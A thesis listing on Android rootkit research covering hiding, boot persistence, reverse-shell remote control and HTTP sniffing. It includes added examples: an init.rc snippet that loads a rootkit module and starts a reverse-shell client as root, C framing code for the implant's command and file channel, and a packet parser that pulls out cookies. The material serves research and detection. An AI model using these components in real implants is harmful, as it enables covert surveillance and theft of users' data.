
Rootkit Research Based On Android

Posted on: 2019-10-03
Degree: Master
Type: Thesis
Country: China
Candidate: Y Z Jiang
Full Text: PDF
GTID: 2428330563458638
Subject: Electronic and communication engineering
Abstract/Summary:
With the widespread adoption of Android phones, their security problems are growing as well. Most backdoors on Android are built on rootkit techniques, and unscrupulous manufacturers and attackers can plant such backdoors on phones through a variety of illegitimate channels without the ordinary user noticing. Kernel-level rootkits rely on stealth and persistence to let an attacker extract data from the target device, and current rootkits evade detection by altering the execution flow of software at the kernel level. Understanding and evaluating these techniques therefore makes it possible to detect rootkits more reliably and to prevent the leakage of personal and even corporate data.

This thesis studies the Android operating system source code and implements four functions based on rootkit technology: hiding, self-starting, remote control and data sniffing. A reverse-shell client pre-embedded on the target phone starts itself during boot; over the shell connection the attacker can not only control the phone remotely but also transfer files, and the hiding and data-sniffing modules are delivered to the target phone through it. These modules hide files, processes, kernel modules and communication ports, and they capture sensitive user information.

First, rootkit-based hiding is studied. System call hooking, API hooking, VFS hooking and inline hooking are used to control the loading and hiding of the rootkit's own modules and to hide files and processes. The rootkit is implemented mainly as a loadable kernel module. Hooking the module's init function and the show function of the corresponding sequence-file operations (seq_operations) through API hooking controls module loading and hides the module and its communication ports; files and processes are hidden through system call hijacking, VFS hooks and inline hooks.

Second, rootkit-based self-starting is studied. The Android boot process is analysed to find the point at which the rootkit can start itself. Adding the corresponding service and commands to the init.rc startup script, using the init language syntax, makes both the kernel module and the console executable start automatically at boot.

Third, rootkit-based remote control is studied. The attacker establishes a reverse shell connection with the target phone: the attacker's end listens and the controlled end connects to it. During the connection, character strings and files are distinguished by a flag structure sent ahead of each message. The attacker sends common shell commands to the controlled end, which executes them and returns the result to the attacker. Files can also be pushed to the controlled end over the same connection, and the attacker can pull the address book, short messages and other files from it.

Finally, rootkit-based network sniffing is studied. By analysing the Netfilter hooks of the IPv4 stack, packets entering the upper protocol layers are filtered; with the filter port set to 80, packets carrying HTTP traffic are captured, and the HTTP headers of the sniffed packets are analysed for the sensitive information they may contain. The packet capture program thus uses the Netfilter module to capture packets from HTTP-based communication.
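The init.rc additions the self-starting section describes, as an added illustration rather than the thesis's own script. The trigger, module path, service name and binary path are placeholders; it also assumes an init.rc that can be modified at all, which on a locked device with a verified, read-only system partition and enforcing SELinux is not the case:

```text
# Added example (not from the thesis). Assumed paths and names.
# Load the rootkit module once /data is mounted, i.e. before apps start.
on post-fs-data
    insmod /data/local/rk.ko

# Console executable (the reverse-shell client) started by init as root.
service rk_shell /data/local/rk_shell
    class main
    user root
    oneshot
```

For a defender the same lines are the artifact to look for: any service entry or insmod command in an init script that does not match the vendor image, and any loaded module absent from /proc/modules, is exactly the evidence this technique leaves behind.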
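The "flag structure" that the remote-control section uses to tell commands, results and files apart on the reverse-shell stream, as an added example in C. This is not the thesis's code: the field layout (one type byte, a fixed 64-byte NUL-terminated file name, a 32-bit big-endian length) and the frame names are assumptions. The decoder treats the peer as untrusted and rejects bad types, unterminated names and oversized lengths rather than trusting the header, and it reports "need more bytes" separately from "malformed", which is the distinction a TCP reader actually needs. The sample session in main is constructed.

```c
/* Added example, not the thesis's code: framing for the reverse-shell stream.
 * Wire layout (assumed): [type:1][name:64, NUL-terminated][len:4 big-endian][payload]. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum frame_type { FRAME_CMD = 1, FRAME_RESULT = 2, FRAME_FILE = 3 };

#define FRAME_NAME_MAX    64                     /* file name field, NUL-terminated */
#define FRAME_HDR_LEN     (1 + FRAME_NAME_MAX + 4)
#define FRAME_MAX_PAYLOAD (1u << 20)             /* refuse absurd lengths before copying */

struct frame {
    uint8_t        type;
    char           name[FRAME_NAME_MAX];         /* empty for CMD and RESULT frames */
    uint32_t       len;
    const uint8_t *payload;                      /* points into the receive buffer */
};

/* Serialise one frame into out. Returns bytes written, 0 if the frame is invalid
 * or does not fit in cap. */
size_t frame_encode(uint8_t *out, size_t cap, uint8_t type,
                    const char *name, const void *payload, uint32_t len)
{
    size_t need = FRAME_HDR_LEN + (size_t)len;
    if (type < FRAME_CMD || type > FRAME_FILE) return 0;
    if (len > FRAME_MAX_PAYLOAD || need > cap) return 0;
    if (name && strlen(name) >= FRAME_NAME_MAX) return 0;

    out[0] = type;
    memset(out + 1, 0, FRAME_NAME_MAX);
    if (name) memcpy(out + 1, name, strlen(name));
    out[1 + FRAME_NAME_MAX]     = (uint8_t)(len >> 24);
    out[1 + FRAME_NAME_MAX + 1] = (uint8_t)(len >> 16);
    out[1 + FRAME_NAME_MAX + 2] = (uint8_t)(len >> 8);
    out[1 + FRAME_NAME_MAX + 3] = (uint8_t)len;
    if (len) memcpy(out + FRAME_HDR_LEN, payload, len);
    return need;
}

/* Parse one frame from the front of in. Returns bytes consumed (> 0),
 * 0 if more data must be read first, -1 if the header is malformed. */
long frame_decode(const uint8_t *in, size_t avail, struct frame *f)
{
    if (avail < FRAME_HDR_LEN) return 0;
    uint8_t type = in[0];
    if (type < FRAME_CMD || type > FRAME_FILE) return -1;
    if (in[FRAME_NAME_MAX] != 0) return -1;      /* name field must be NUL-terminated */
    const uint8_t *l = in + 1 + FRAME_NAME_MAX;
    uint32_t len = ((uint32_t)l[0] << 24) | ((uint32_t)l[1] << 16) |
                   ((uint32_t)l[2] << 8)  |  (uint32_t)l[3];
    if (len > FRAME_MAX_PAYLOAD) return -1;
    if (avail < FRAME_HDR_LEN + (size_t)len) return 0;
    f->type = type;
    memcpy(f->name, in + 1, FRAME_NAME_MAX);
    f->len = len;
    f->payload = in + FRAME_HDR_LEN;
    return (long)(FRAME_HDR_LEN + len);
}

/* Count the complete frames in a receive buffer that holds several back to back,
 * the way bytes arrive on the socket; stops at the first partial or bad frame. */
int frame_count(const uint8_t *buf, size_t n)
{
    int count = 0;
    size_t off = 0;
    while (off < n) {
        struct frame f;
        long used = frame_decode(buf + off, n - off, &f);
        if (used <= 0) break;
        off += (size_t)used;
        count++;
    }
    return count;
}

int main(void)
{
    /* Constructed session: attacker sends a command, controlled end answers,
     * then the controlled end uploads a file. */
    uint8_t wire[1024];
    size_t n = 0;
    const char *cmd = "getprop ro.build.version.release";
    const char *res = "9\n";
    const uint8_t vcf[] = "BEGIN:VCARD\r\nFN:Alice\r\nEND:VCARD\r\n";
    n += frame_encode(wire + n, sizeof wire - n, FRAME_CMD,    NULL, cmd, (uint32_t)strlen(cmd));
    n += frame_encode(wire + n, sizeof wire - n, FRAME_RESULT, NULL, res, (uint32_t)strlen(res));
    n += frame_encode(wire + n, sizeof wire - n, FRAME_FILE, "contacts.vcf", vcf, (uint32_t)(sizeof vcf - 1));

    struct frame f;
    long used;
    for (size_t off = 0; (used = frame_decode(wire + off, n - off, &f)) > 0; off += (size_t)used)
        printf("type=%u name=\"%s\" len=%u\n", f.type, f.name, f.len);
    return 0;
}
```

Two points follow from the layout. The fixed header with a small type byte and a zero-padded name field is a stable byte pattern at the start of every message, so the same framing that makes the protocol easy to implement also makes it easy to write a network signature for. And the length checks are not optional: a controlled end that trusts the length field can be crashed or overflowed by anyone who reaches the listening port, which is a real risk for an implant that connects out to a hard-coded address.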
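The per-packet check behind the sniffing section, as an added C example that is not the thesis's code. In the kernel this logic would sit in an nf_hookfn registered at NF_INET_LOCAL_IN and read skb data; here it is written over a plain byte buffer so that it runs in user space, and it goes one step further than the description by also parsing the request line and pulling out the Host and Cookie headers. The sample packet is constructed, the addresses are documentation ranges, and the struct and function names are assumptions:

```c
/* Added example, not the thesis's code: the per-packet logic a Netfilter hook
 * would run, over a byte buffer. Every step is bounds-checked, which a hook
 * reading skb data must do as well. */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct http_info {
    char method[8], path[128], host[128];
    int  has_cookie;   /* a Cookie: header, i.e. a session token sent in the clear */
};

static int ieq(const char *a, const char *b, size_t n)   /* case-insensitive prefix compare */
{
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)a[i]) != tolower((unsigned char)b[i])) return 0;
    return 1;
}

/* Find "name: value" among the header lines and copy value (minus CRLF) to dst. */
static int copy_header(const char *hdrs, size_t n, const char *name, char *dst, size_t cap)
{
    size_t nl = strlen(name);
    for (const char *p = hdrs, *end = hdrs + n; p < end; ) {
        const char *eol = memchr(p, '\n', (size_t)(end - p));
        size_t linelen = eol ? (size_t)(eol - p) : (size_t)(end - p);
        if (linelen > nl && ieq(p, name, nl) && p[nl] == ':') {
            const char *v = p + nl + 1;
            while (v < p + linelen && *v == ' ') v++;
            size_t vl = (size_t)(p + linelen - v);
            if (vl && v[vl - 1] == '\r') vl--;
            if (vl >= cap) vl = cap - 1;
            memcpy(dst, v, vl); dst[vl] = '\0';
            return 1;
        }
        if (!eol) break;
        p = eol + 1;
    }
    return 0;
}

/* Returns 0 and fills *out when pkt is an IPv4/TCP segment to port 80 whose data
 * starts with an HTTP request line; -1 for anything else, including truncated data. */
int http_request_info(const uint8_t *pkt, size_t len, struct http_info *out)
{
    if (len < 20 || (pkt[0] >> 4) != 4) return -1;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4, total = ((size_t)pkt[2] << 8) | pkt[3];
    if (ihl < 20 || total > len || total < ihl + 20 || pkt[9] != 6) return -1;
    len = total;                                           /* drop trailing padding */
    const uint8_t *tcp = pkt + ihl;
    if ((((uint16_t)tcp[2] << 8) | tcp[3]) != 80) return -1;   /* the filter port */
    size_t doff = (size_t)(tcp[12] >> 4) * 4;
    if (doff < 20 || ihl + doff > len) return -1;
    const char *data = (const char *)(pkt + ihl + doff);
    size_t dlen = len - ihl - doff;
    if (dlen == 0) return -1;                              /* pure ACK, nothing to sniff */

    memset(out, 0, sizeof *out);
    const char *sp1 = memchr(data, ' ', dlen);             /* METHOD SP PATH SP HTTP/x.y */
    if (!sp1 || sp1 == data || (size_t)(sp1 - data) >= sizeof out->method) return -1;
    memcpy(out->method, data, (size_t)(sp1 - data));
    const char *sp2 = memchr(sp1 + 1, ' ', dlen - (size_t)(sp1 + 1 - data));
    if (!sp2 || (size_t)(sp2 - sp1 - 1) >= sizeof out->path) return -1;
    memcpy(out->path, sp1 + 1, (size_t)(sp2 - sp1 - 1));
    if (dlen - (size_t)(sp2 + 1 - data) < 5 || strncmp(sp2 + 1, "HTTP/", 5) != 0)
        return -1;                                         /* port 80 but not HTTP */
    const char *eol = memchr(sp2, '\n', dlen - (size_t)(sp2 - data));
    if (!eol) return -1;
    const char *hdrs = eol + 1;
    size_t hlen = dlen - (size_t)(hdrs - data);
    copy_header(hdrs, hlen, "Host", out->host, sizeof out->host);
    char cookie[256];
    out->has_cookie = copy_header(hdrs, hlen, "Cookie", cookie, sizeof cookie);
    return 0;
}

/* Constructed IPv4/TCP segment carrying payload to dport. Checksums stay zero;
 * the parser does not verify them. Returns the packet length, 0 if it does not fit. */
size_t build_tcp_packet(uint8_t *buf, size_t cap, uint16_t dport, const char *payload)
{
    static const uint8_t src[4] = {10, 0, 0, 2}, dst[4] = {192, 0, 2, 10};
    size_t plen = strlen(payload), total = 40 + plen;
    if (total > cap || total > 0xffff) return 0;
    memset(buf, 0, 40);
    buf[0] = 0x45;                                   /* IPv4, IHL 5 words */
    buf[2] = (uint8_t)(total >> 8); buf[3] = (uint8_t)total;
    buf[8] = 64; buf[9] = 6;                         /* TTL, protocol TCP */
    memcpy(buf + 12, src, 4); memcpy(buf + 16, dst, 4);
    buf[20] = 0xc3; buf[21] = 0x50;                  /* source port 50000 */
    buf[22] = (uint8_t)(dport >> 8); buf[23] = (uint8_t)dport;
    buf[32] = 0x50; buf[33] = 0x18;                  /* data offset 5 words, PSH|ACK */
    memcpy(buf + 40, payload, plen);
    return total;
}

static const char SAMPLE_REQ[] =
    "GET /login?user=alice HTTP/1.1\r\nHost: example.com\r\nCookie: session=abc123\r\n\r\n";

int main(void)
{
    uint8_t pkt[512];
    struct http_info info;
    size_t n = build_tcp_packet(pkt, sizeof pkt, 80, SAMPLE_REQ);
    if (http_request_info(pkt, n, &info) == 0)
        printf("%s %s host=%s cookie=%s\n", info.method, info.path, info.host,
               info.has_cookie ? "yes" : "no");
    return 0;
}
```

The caveat that goes with a port-80 filter is that it sees only cleartext HTTP: anything the phone sends over TLS on port 443 is invisible to this hook, and apps that pin certificates leave nothing to read even for a kernel-level attacker on the network path. The flip side for defenders is that an implant registering a Netfilter hook leaves a kernel-side trace, and a hook that forwards captured headers off the device generates outbound traffic that does not belong to any app.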
Keywords/Search Tags:Android System, Rootkit, Hook Technology, Reverse Shell